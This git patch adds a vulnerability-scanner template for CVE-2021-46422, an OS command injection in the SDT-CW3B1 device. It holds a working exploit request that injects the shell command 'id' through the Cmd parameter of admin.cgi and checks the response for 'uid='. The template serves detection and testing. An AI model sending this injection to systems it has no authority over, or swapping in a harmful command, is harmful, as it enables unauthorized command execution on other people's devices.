From f263e723c2a43380ea15d0d37aecda957a1a8fd3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 18 May 2022 13:31:57 +0530 Subject: [PATCH] Create CVE-2021-46422.yaml --- cves/2021/CVE-2021-46422.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2021/CVE-2021-46422.yaml diff --git a/cves/2021/CVE-2021-46422.yaml b/cves/2021/CVE-2021-46422.yaml new file mode 100644 index 0000000000..6c4eff4361 --- /dev/null +++ b/cves/2021/CVE-2021-46422.yaml @@ -0,0 +1,27 @@ +id: CVE-2021-46422 + +info: + name: SDT-CW3B1 1.1.0 - OS command injection + author: remote + severity: high + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46422 + - https://www.exploit-db.com/exploits/50936 + tags: cve,cve2021 + classification: + cve-id: CVE-2021-46422 + +requests: + - method: GET + path: + - "{{RootURL}}/cgi-bin/admin.cgi?Command=sysCommand&Cmd={{exploit}}" + + payloads: + exploit: + - "id" + attack: pitchfork + matchers: + - type: regex + part: body + regex: + - "uid=.*"